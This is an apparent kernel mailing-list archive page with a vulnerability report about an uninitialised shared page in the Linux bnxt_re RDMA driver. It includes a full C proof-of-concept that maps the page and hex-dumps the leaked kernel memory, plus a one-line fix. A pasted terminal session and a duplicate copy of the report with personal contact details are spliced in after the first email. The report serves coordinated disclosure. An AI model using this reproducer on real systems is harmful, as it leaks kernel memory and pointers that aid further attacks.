Linux RDMA and InfiniBand development
 help / color / mirror / Atom feed
* [security] RDMA/bnxt_re: kernel infoleak via uninitialised shpg shared page exposed to userspace
@ 2026-05-08 13:45 Henrik Holmberg
  2026-05-08 13:51 ` Greg KH
  0 siblings, 1 reply; 6+ messages in thread
From: Henrik Holmberg @ 2026-05-08 13:45 UTC (permalink / raw)
  To: security; +Cc: selvin.xavier, kalesh-anakkur.purayil, linux-rdma

Hi,

I am reporting an information disclosure in the bnxt_re RDMA driver.
The shared page handed to userspace via BNXT_RE_MMAP_SH_PAGE is
allocated with __get_free_page(GFP_KERNEL) and never zeroed, leaking
up to 4092 bytes of stale kernel data for each ucontext a process creates.

Affected kernel versions
------------------------
Confirmed present in:
  - 6.6.81 LTS    drivers/infiniband/hw/bnxt_re/ib_verbs.c:4158
  - 6.12.42 LTS   drivers/infiniband/hw/bnxt_re/ib_verbs.c:4241
  - 7.0.5 stable  drivers/infiniband/hw/bnxt_re/ib_verbs.c:4378
  - mainline as of 2026-05-08 (per torvalds/master tip)

No memset(uctx->shpg, 0, PAGE_SIZE) exists in any of these trees.

Problem description
-------------------
bnxt_re_alloc_ucontext() in drivers/infiniband/hw/bnxt_re/ib_verbs.c
allocates the per-context shared page:

    uctx->shpg = (void *)__get_free_page(GFP_KERNEL);

The page is then registered for mmap exposure via:

    entry = bnxt_re_mmap_entry_insert(uctx, 0, BNXT_RE_MMAP_SH_PAGE, NULL);

And mapped into userspace by bnxt_re_mmap():

    case BNXT_RE_MMAP_SH_PAGE:
        ret = vm_insert_page(vma, vma->vm_start, virt_to_page(uctx->shpg));
        break;

The only kernel write into this page is a single u32 store of the AVID
at offset BNXT_RE_AVID_OFFT (0x10) inside bnxt_re_create_ah():

    wrptr = (u32 *)(uctx->shpg + BNXT_RE_AVID_OFFT);
    *wrptr = ah->qplib_ah.id;

Since __get_free_page(GFP_KERNEL) returns a buddy page that is not
zeroed, the remaining 4092 bytes of the page contain stale kernel data
when the userspace process maps it. Any user with access to the
relevant /dev/infiniband/uverbsX node and a bnxt_re device can read
this data via a single mmap() call after IB_USER_VERBS_CMD_GET_CONTEXT.

The leaked content depends on the freed kernel object that previously
occupied the page. In practice it can include kernel pointers
(KASLR bypass), slab objects, fragments of recently freed user-process
pages, network skbs, and DMA ring data.

Why this is unintentional, not by design
----------------------------------------
1. The same file already uses get_zeroed_page() for the analogous
   per-SRQ and per-CQ user-mapped shared pages:

       drivers/infiniband/hw/bnxt_re/ib_verbs.c:1956
           srq->uctx_srq_page = (void *)get_zeroed_page(GFP_KERNEL);
       drivers/infiniband/hw/bnxt_re/ib_verbs.c:3229
           cq->uctx_cq_page  = (void *)get_zeroed_page(GFP_KERNEL);

   shpg is the only outlier.

2. Other RDMA drivers consistently zero pages they expose:

       drivers/infiniband/hw/qedr/verbs.c:758    get_zeroed_page(GFP_USER)
       drivers/infiniband/hw/mlx4/mr.c:306       get_zeroed_page(GFP_KERNEL)
       drivers/infiniband/hw/mthca/mthca_allocator.c:129
                                                 get_zeroed_page(GFP_ATOMIC)
       drivers/infiniband/hw/efa/efa_verbs.c:190 alloc_pages_exact(... __GFP_ZERO)
       drivers/infiniband/hw/mlx5/umr.c:509      gfp_mask |= __GFP_ZERO

3. The driver only ever writes 4 bytes of the 4096-byte page; the
   remaining bytes have no driver-defined contents and should be zero
   if the convention is respected.

Reproducer
----------
A standalone C reproducer (no libibverbs dependency, only kernel uapi
inline-copied) is included below. It opens /dev/infiniband/uverbsX,
creates a ucontext with IB_USER_VERBS_CMD_GET_CONTEXT, mmap()'s pgoff=0
(BNXT_RE_MMAP_SH_PAGE), and dumps the resulting page.

Build:
    gcc -O2 -Wall -Wextra -o 041_poc 041_bnxt_re_shpg_leak.c

Run on a host with bnxt_re hardware:
    ./041_poc

Source (paste into 041_bnxt_re_shpg_leak.c):

----- 8< ----- 8< ----- 8< -----
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>

/*
 * Minimal inline copies of the uverbs write() ABI used by this reproducer,
 * so that it builds without libibverbs or kernel headers.
 */

/* Command code stored in ib_uverbs_cmd_hdr.command to request a ucontext. */
enum { IB_USER_VERBS_CMD_GET_CONTEXT = 1 };

/* Header that starts every command written to the uverbs device. */
struct ib_uverbs_cmd_hdr {
    uint32_t command;   /* command code, e.g. IB_USER_VERBS_CMD_GET_CONTEXT */
    /*
     * Request length in 32-bit words.
     * NOTE(review): the kernel is understood to compare in_words * 4 with the
     * full write() length, header included - confirm against uverbs_main.c.
     */
    uint16_t in_words;
    uint16_t out_words; /* response buffer length in 32-bit words */
};

/* Core part of the GET_CONTEXT request; follows the header directly. */
struct ib_uverbs_get_context {
    uint64_t response;       /* user-space address of the response buffer */
    uint64_t driver_data[0]; /* zero-length marker: driver payload starts here */
};

/* Size in bytes of the response buffer handed to the kernel. */
#define BNXT_RE_RESP_BYTES   1024
/* Length in bytes of the mapping that is requested and dumped.
 * NOTE(review): hard-coded; assumes a 4 KiB page size - confirm on target. */
#define PAGE_SIZE_LOCAL      4096

/*
 * Locate the first uverbs character device under /dev/infiniband.
 *
 * out      buffer that receives the full device path (NUL-terminated)
 * out_len  size of `out` in bytes
 *
 * Returns 0 and fills `out` on success. Returns -1 (after printing a
 * diagnostic to stderr) when the directory cannot be opened, when it holds
 * no entry whose name starts with "uverbs", or when the path does not fit
 * into `out`.
 *
 * The first matching entry wins; no check is made that the node belongs to
 * a bnxt_re device.
 */
static int find_uverbs(char *out, size_t out_len)
{
    if (out == NULL || out_len == 0)
        return -1;

    DIR *d = opendir("/dev/infiniband");
    if (!d) {
        perror("opendir");
        return -1;
    }

    int rc = -1;
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        if (strncmp(de->d_name, "uverbs", 6) != 0)
            continue;

        /* snprintf reports the untruncated length; reject a clipped path
         * instead of handing the caller a name that does not exist. */
        int n = snprintf(out, out_len, "/dev/infiniband/%s", de->d_name);
        if (n < 0 || (size_t)n >= out_len) {
            fprintf(stderr, "find_uverbs: path for %s does not fit in %zu bytes\n",
                    de->d_name, out_len);
            closedir(d);
            return -1;
        }
        rc = 0;
        break;
    }
    closedir(d);

    /* Make the "directory exists but is empty" case visible to the user. */
    if (rc != 0)
        fprintf(stderr, "find_uverbs: no uverbs node in /dev/infiniband\n");
    return rc;
}

/*
 * Create a ucontext on an open uverbs file descriptor by writing a
 * GET_CONTEXT command to it.
 *
 * fd  descriptor of an opened /dev/infiniband/uverbsX node
 *
 * Returns 0 when the kernel accepted the whole command, -1 otherwise
 * (a diagnostic is printed to stderr). The response is received into a
 * static buffer and is not inspected.
 */
static int alloc_ucontext(int fd)
{
    /* Header, core GET_CONTEXT request, then one 64-bit word of
     * driver-specific request data, all zero except the fields set below. */
    struct {
        struct ib_uverbs_cmd_hdr hdr;
        struct ib_uverbs_get_context cmd;
        uint64_t bnxt_re_req[1];
    } req;
    static uint8_t resp_buf[BNXT_RE_RESP_BYTES] __attribute__((aligned(8)));

    memset(&req, 0, sizeof(req));
    memset(resp_buf, 0, sizeof(resp_buf));

    req.hdr.command   = IB_USER_VERBS_CMD_GET_CONTEXT;
    /* in_words must describe the complete write, header included: the
     * kernel rejects the command with EINVAL when in_words * 4 differs
     * from the number of bytes passed to write(). */
    req.hdr.in_words  = sizeof(req) / 4;
    req.hdr.out_words = BNXT_RE_RESP_BYTES / 4;
    req.cmd.response  = (uintptr_t)resp_buf;

    ssize_t written = write(fd, &req, sizeof(req));
    if (written < 0) {
        perror("write get_context");
        return -1;
    }
    /* A command that was only partially consumed did not create a context. */
    if ((size_t)written != sizeof(req)) {
        fprintf(stderr, "write get_context: short write (%zd of %zu bytes)\n",
                written, sizeof(req));
        return -1;
    }
    return 0;
}

/*
 * Reproducer entry point: find a uverbs node, create a ucontext on it,
 * map page offset 0 read-only and dump the mapped page.
 *
 * Prints the number of non-zero bytes outside offsets 0x10..0x13 (the AVID
 * field), followed by a 16-bytes-per-row hex dump. Exit status is 0 after
 * a successful dump and 1 on any failure.
 */
int main(void)
{
    char dev_path[256];
    int status = 1;
    int fd;
    void *map;
    const uint8_t *page;
    int stale = 0;

    if (find_uverbs(dev_path, sizeof(dev_path)) < 0)
        return status;

    fd = open(dev_path, O_RDWR);
    if (fd < 0) {
        perror("open");
        return status;
    }

    if (alloc_ucontext(fd) < 0)
        goto out_close;

    map = mmap(NULL, PAGE_SIZE_LOCAL, PROT_READ, MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) {
        perror("mmap");
        goto out_close;
    }
    page = map;

    /* Count every non-zero byte except the four bytes of the AVID field. */
    for (int off = 0; off < PAGE_SIZE_LOCAL; off++) {
        int in_avid = (off >= 0x10 && off <= 0x13);

        if (!in_avid && page[off])
            stale++;
    }
    printf("non-zero bytes outside AVID field: %d / %d\n",
           stale, PAGE_SIZE_LOCAL - 4);

    /* Hex dump, one row of 16 bytes per line, prefixed with the row offset. */
    for (int row = 0; row < PAGE_SIZE_LOCAL; row += 16) {
        printf("%04x  ", row);
        for (int col = 0; col < 16; col++)
            printf("%02x ", page[row + col]);
        printf("\n");
    }

    munmap(map, PAGE_SIZE_LOCAL);
    status = 0;

out_close:
    close(fd);
    return status;
}
----- >8 ----- >8 ----- >8 -----

Conditions
----------
- Hardware: Broadcom NetXtreme-E NIC with bnxt_re module loaded
  (BCM5750x family).
- Permissions: read/write access to /dev/infiniband/uverbsX. On most
  distributions this requires membership in the rdma group, but some
  configurations expose the node more broadly via udev rules.
- No CAP_SYS_ADMIN, CAP_NET_ADMIN, or CAP_NET_RAW required.

Suggested fix (one-line)
------------------------
diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
@@ -4375,7 +4375,7 @@ int bnxt_re_alloc_ucontext(struct ib_ucontext *ctx, struct ib_udata *udata)

        uctx->rdev = rdev;

-       uctx->shpg = (void *)__get_free_page(GFP_KERNEL);
+       uctx->shpg = (void *)get_zeroed_page(GFP_KERNEL);
        if (!uctx->shpg) {
                rc = -ENOMEM;
                goto fail;

Performance impact: one page-zeroing per ucontext allocation, i.e. once
per IB_USER_VERBS_CMD_GET_CONTEXT call (when an application opens the
device), not per connection. Negligible.

Disclosure
----------
I have not shared this report outside this email. I am willing to
follow the standard Linux kernel security disclosure timeline (up to
14 days). Please let me know once you have confirmed the issue, and
whether you want me to handle the CVE request via cve@kernel.org or
whether the security team will route it.

Best regards,
Henrik Holmberg
15:29 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/disclosure
❯ cd ..
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt
❯ ls
disclosure  findings  poc  sources
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt
❯ cd poc/
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ ls
041_bnxt_re_shpg_leak.c  041_poc
15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ ./041_poc
[!] /dev/infiniband saknas — RDMA-stack ej laddad?
✘1 15:30 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ id
uid=1000(l0rds474n) gid=1001(l0rds474n)
grupper=1001(l0rds474n),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),106(netdev),120(bluetooth),126(lpadmin),129(scanner),1000(docker)
15:31 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/poc
❯ cd ..
15:40 l0rds474n@ghostnode:~/Dokument/CVE-Hunt
❯ cd disclosure/
15:40 l0rds474n@ghostnode:~/Dokument/CVE-Hunt/disclosure
❯ cat email-template.txt
To: security@kernel.org
Cc: selvin.xavier@broadcom.com, kalesh-anakkur.purayil@broadcom.com,
linux-rdma@vger.kernel.org
Subject: [security] RDMA/bnxt_re: kernel infoleak via uninitialised
shpg shared page exposed to userspace

Hi,

I am a Senior IT Security Researcher at Defensify (https://defensify.se),
reporting an information disclosure vulnerability in the bnxt_re RDMA
driver. The shared page handed to userspace via BNXT_RE_MMAP_SH_PAGE is
allocated with __get_free_page(GFP_KERNEL) and never zeroed, leaking
up to 4092 bytes of stale kernel data for each ucontext a process creates.

Affected kernel versions
------------------------
Confirmed present in:
  - 6.6.81 LTS    drivers/infiniband/hw/bnxt_re/ib_verbs.c:4158
  - 6.12.42 LTS   drivers/infiniband/hw/bnxt_re/ib_verbs.c:4241
  - 7.0.5 stable  drivers/infiniband/hw/bnxt_re/ib_verbs.c:4378
  - mainline as of 2026-05-08 (per torvalds/master tip)

No memset(uctx->shpg, 0, PAGE_SIZE) exists in any of these trees.

Problem description
-------------------
bnxt_re_alloc_ucontext() in drivers/infiniband/hw/bnxt_re/ib_verbs.c
allocates the per-context shared page:

    uctx->shpg = (void *)__get_free_page(GFP_KERNEL);

The page is then registered for mmap exposure via:

    entry = bnxt_re_mmap_entry_insert(uctx, 0, BNXT_RE_MMAP_SH_PAGE, NULL);

And mapped into userspace by bnxt_re_mmap():

    case BNXT_RE_MMAP_SH_PAGE:
        ret = vm_insert_page(vma, vma->vm_start, virt_to_page(uctx->shpg));
        break;

The only kernel write into this page is a single u32 store of the AVID
at offset BNXT_RE_AVID_OFFT (0x10) inside bnxt_re_create_ah():

    wrptr = (u32 *)(uctx->shpg + BNXT_RE_AVID_OFFT);
    *wrptr = ah->qplib_ah.id;

Since __get_free_page(GFP_KERNEL) returns a buddy page that is not
zeroed, the remaining 4092 bytes of the page contain stale kernel data
when the userspace process maps it. Any user with access to the
relevant /dev/infiniband/uverbsX node and a bnxt_re device can read
this data via a single mmap() call after IB_USER_VERBS_CMD_GET_CONTEXT.

The leaked content depends on the freed kernel object that previously
occupied the page. In practice it can include kernel pointers
(KASLR bypass), slab objects, fragments of recently freed user-process
pages, network skbs, and DMA ring data.

Why this is unintentional, not by design
----------------------------------------
1. The same file already uses get_zeroed_page() for the analogous
   per-SRQ and per-CQ user-mapped shared pages:

       drivers/infiniband/hw/bnxt_re/ib_verbs.c:1956
           srq->uctx_srq_page = (void *)get_zeroed_page(GFP_KERNEL);
       drivers/infiniband/hw/bnxt_re/ib_verbs.c:3229
           cq->uctx_cq_page  = (void *)get_zeroed_page(GFP_KERNEL);

   shpg is the only outlier.

2. Other RDMA drivers consistently zero pages they expose:

       drivers/infiniband/hw/qedr/verbs.c:758    get_zeroed_page(GFP_USER)
       drivers/infiniband/hw/mlx4/mr.c:306       get_zeroed_page(GFP_KERNEL)
       drivers/infiniband/hw/mthca/mthca_allocator.c:129
                                                 get_zeroed_page(GFP_ATOMIC)
       drivers/infiniband/hw/efa/efa_verbs.c:190 alloc_pages_exact(... __GFP_ZERO)
       drivers/infiniband/hw/mlx5/umr.c:509      gfp_mask |= __GFP_ZERO

3. The driver only ever writes 4 bytes of the 4096-byte page; the
   remaining bytes have no driver-defined contents and should be zero
   if the convention is respected.

Reproducer
----------
A standalone C reproducer (no libibverbs dependency, only kernel uapi
inline-copied) is included below. It opens /dev/infiniband/uverbsX,
creates a ucontext with IB_USER_VERBS_CMD_GET_CONTEXT, mmap()'s pgoff=0
(BNXT_RE_MMAP_SH_PAGE), and dumps the resulting page.

Build:
    gcc -O2 -Wall -Wextra -o 041_poc 041_bnxt_re_shpg_leak.c

Run on a host with bnxt_re hardware:
    ./041_poc

Source (paste into 041_bnxt_re_shpg_leak.c):

----- 8< ----- 8< ----- 8< -----
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>

/*
 * Minimal inline copies of the uverbs write() ABI used by this reproducer,
 * so that it builds without libibverbs or kernel headers.
 */

/* Command code stored in ib_uverbs_cmd_hdr.command to request a ucontext. */
enum { IB_USER_VERBS_CMD_GET_CONTEXT = 1 };

/* Header that starts every command written to the uverbs device. */
struct ib_uverbs_cmd_hdr {
    uint32_t command;   /* command code, e.g. IB_USER_VERBS_CMD_GET_CONTEXT */
    /*
     * Request length in 32-bit words.
     * NOTE(review): the kernel is understood to compare in_words * 4 with the
     * full write() length, header included - confirm against uverbs_main.c.
     */
    uint16_t in_words;
    uint16_t out_words; /* response buffer length in 32-bit words */
};

/* Core part of the GET_CONTEXT request; follows the header directly. */
struct ib_uverbs_get_context {
    uint64_t response;       /* user-space address of the response buffer */
    uint64_t driver_data[0]; /* zero-length marker: driver payload starts here */
};

/* Size in bytes of the response buffer handed to the kernel. */
#define BNXT_RE_RESP_BYTES   1024
/* Length in bytes of the mapping that is requested and dumped.
 * NOTE(review): hard-coded; assumes a 4 KiB page size - confirm on target. */
#define PAGE_SIZE_LOCAL      4096

/*
 * Locate the first uverbs character device under /dev/infiniband.
 *
 * out      buffer that receives the full device path (NUL-terminated)
 * out_len  size of `out` in bytes
 *
 * Returns 0 and fills `out` on success. Returns -1 (after printing a
 * diagnostic to stderr) when the directory cannot be opened, when it holds
 * no entry whose name starts with "uverbs", or when the path does not fit
 * into `out`.
 *
 * The first matching entry wins; no check is made that the node belongs to
 * a bnxt_re device.
 */
static int find_uverbs(char *out, size_t out_len)
{
    if (out == NULL || out_len == 0)
        return -1;

    DIR *d = opendir("/dev/infiniband");
    if (!d) {
        perror("opendir");
        return -1;
    }

    int rc = -1;
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        if (strncmp(de->d_name, "uverbs", 6) != 0)
            continue;

        /* snprintf reports the untruncated length; reject a clipped path
         * instead of handing the caller a name that does not exist. */
        int n = snprintf(out, out_len, "/dev/infiniband/%s", de->d_name);
        if (n < 0 || (size_t)n >= out_len) {
            fprintf(stderr, "find_uverbs: path for %s does not fit in %zu bytes\n",
                    de->d_name, out_len);
            closedir(d);
            return -1;
        }
        rc = 0;
        break;
    }
    closedir(d);

    /* Make the "directory exists but is empty" case visible to the user. */
    if (rc != 0)
        fprintf(stderr, "find_uverbs: no uverbs node in /dev/infiniband\n");
    return rc;
}

/*
 * Create a ucontext on an open uverbs file descriptor by writing a
 * GET_CONTEXT command to it.
 *
 * fd  descriptor of an opened /dev/infiniband/uverbsX node
 *
 * Returns 0 when the kernel accepted the whole command, -1 otherwise
 * (a diagnostic is printed to stderr). The response is received into a
 * static buffer and is not inspected.
 */
static int alloc_ucontext(int fd)
{
    /* Header, core GET_CONTEXT request, then one 64-bit word of
     * driver-specific request data, all zero except the fields set below. */
    struct {
        struct ib_uverbs_cmd_hdr hdr;
        struct ib_uverbs_get_context cmd;
        uint64_t bnxt_re_req[1];
    } req;
    static uint8_t resp_buf[BNXT_RE_RESP_BYTES] __attribute__((aligned(8)));

    memset(&req, 0, sizeof(req));
    memset(resp_buf, 0, sizeof(resp_buf));

    req.hdr.command   = IB_USER_VERBS_CMD_GET_CONTEXT;
    /* in_words must describe the complete write, header included: the
     * kernel rejects the command with EINVAL when in_words * 4 differs
     * from the number of bytes passed to write(). */
    req.hdr.in_words  = sizeof(req) / 4;
    req.hdr.out_words = BNXT_RE_RESP_BYTES / 4;
    req.cmd.response  = (uintptr_t)resp_buf;

    ssize_t written = write(fd, &req, sizeof(req));
    if (written < 0) {
        perror("write get_context");
        return -1;
    }
    /* A command that was only partially consumed did not create a context. */
    if ((size_t)written != sizeof(req)) {
        fprintf(stderr, "write get_context: short write (%zd of %zu bytes)\n",
                written, sizeof(req));
        return -1;
    }
    return 0;
}

/*
 * Reproducer entry point: find a uverbs node, create a ucontext on it,
 * map page offset 0 read-only and dump the mapped page.
 *
 * Prints the number of non-zero bytes outside offsets 0x10..0x13 (the AVID
 * field), followed by a 16-bytes-per-row hex dump. Exit status is 0 after
 * a successful dump and 1 on any failure.
 */
int main(void)
{
    char dev_path[256];
    int status = 1;
    int fd;
    void *map;
    const uint8_t *page;
    int stale = 0;

    if (find_uverbs(dev_path, sizeof(dev_path)) < 0)
        return status;

    fd = open(dev_path, O_RDWR);
    if (fd < 0) {
        perror("open");
        return status;
    }

    if (alloc_ucontext(fd) < 0)
        goto out_close;

    map = mmap(NULL, PAGE_SIZE_LOCAL, PROT_READ, MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) {
        perror("mmap");
        goto out_close;
    }
    page = map;

    /* Count every non-zero byte except the four bytes of the AVID field. */
    for (int off = 0; off < PAGE_SIZE_LOCAL; off++) {
        int in_avid = (off >= 0x10 && off <= 0x13);

        if (!in_avid && page[off])
            stale++;
    }
    printf("non-zero bytes outside AVID field: %d / %d\n",
           stale, PAGE_SIZE_LOCAL - 4);

    /* Hex dump, one row of 16 bytes per line, prefixed with the row offset. */
    for (int row = 0; row < PAGE_SIZE_LOCAL; row += 16) {
        printf("%04x  ", row);
        for (int col = 0; col < 16; col++)
            printf("%02x ", page[row + col]);
        printf("\n");
    }

    munmap(map, PAGE_SIZE_LOCAL);
    status = 0;

out_close:
    close(fd);
    return status;
}
----- >8 ----- >8 ----- >8 -----

Conditions
----------
- Hardware: Broadcom NetXtreme-E NIC with bnxt_re module loaded
  (BCM5750x family).
- Permissions: read/write access to /dev/infiniband/uverbsX. On most
  distributions this requires membership in the rdma group, but some
  configurations expose the node more broadly via udev rules.
- No CAP_SYS_ADMIN, CAP_NET_ADMIN, or CAP_NET_RAW required.

Suggested fix (one-line)
------------------------
diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
@@ -4375,7 +4375,7 @@ int bnxt_re_alloc_ucontext(struct ib_ucontext *ctx, struct ib_udata *udata)

        uctx->rdev = rdev;

-       uctx->shpg = (void *)__get_free_page(GFP_KERNEL);
+       uctx->shpg = (void *)get_zeroed_page(GFP_KERNEL);
        if (!uctx->shpg) {
                rc = -ENOMEM;
                goto fail;

Performance impact: one page-zeroing per ucontext allocation, i.e. once
per IB_USER_VERBS_CMD_GET_CONTEXT call (when an application opens the
device), not per connection. Negligible.

Disclosure and credit
---------------------
This issue was discovered during independent vulnerability research at
Defensify (https://defensify.se), a Swedish IT security firm focused on
offensive and defensive kernel-level research.

I have not shared this report outside this email. I am willing to
follow the standard Linux kernel security disclosure timeline (up to
14 days). Please let me know once you have confirmed the issue, and
whether you want me to handle the CVE request via cve@kernel.org or
whether the security team will route it.

For the CVE record, mailing-list announcements, fix commit message
("Reported-by:") and any kernel.org acknowledgements, please attribute
the discovery as follows:

    Reported-by: Lord Ulf Henrik Holmberg <henrik.holmberg@defensify.se> (Defensify)

If your tooling does not accept the parenthetical affiliation, the bare
form

    Reported-by: Lord Ulf Henrik Holmberg <henrik.holmberg@defensify.se>

is acceptable; the @defensify.se address itself attributes the work to
the company. Please CC me on the resulting commit and any CVE record so
we can mirror it on our advisory page.

Best regards,

Lord Ulf Henrik Holmberg
Senior IT Security Researcher
Defensify
https://defensify.se
henrik.holmberg@defensify.se
GitHub: https://github.com/L0rdS474n
+46 73 599 52 38
PGP: https://keybase.io/d313373_m3/pgp_keys.asc

^ permalink raw reply	[flat|nested] 6+ messages in thread

end of thread, other threads:[~2026-05-09  8:42 UTC | newest]

Thread overview: 6+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-08 13:45 [security] RDMA/bnxt_re: kernel infoleak via uninitialised shpg shared page exposed to userspace Henrik Holmberg
2026-05-08 13:51 ` Greg KH
2026-05-08 14:23   ` Henrik Holmberg
2026-05-08 20:24   ` Henrik Holmberg
2026-05-09  4:25     ` Greg KH
2026-05-09  8:40       ` [PATCH] RDMA/bnxt_re: zero shared page before exposing " pomzm67

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox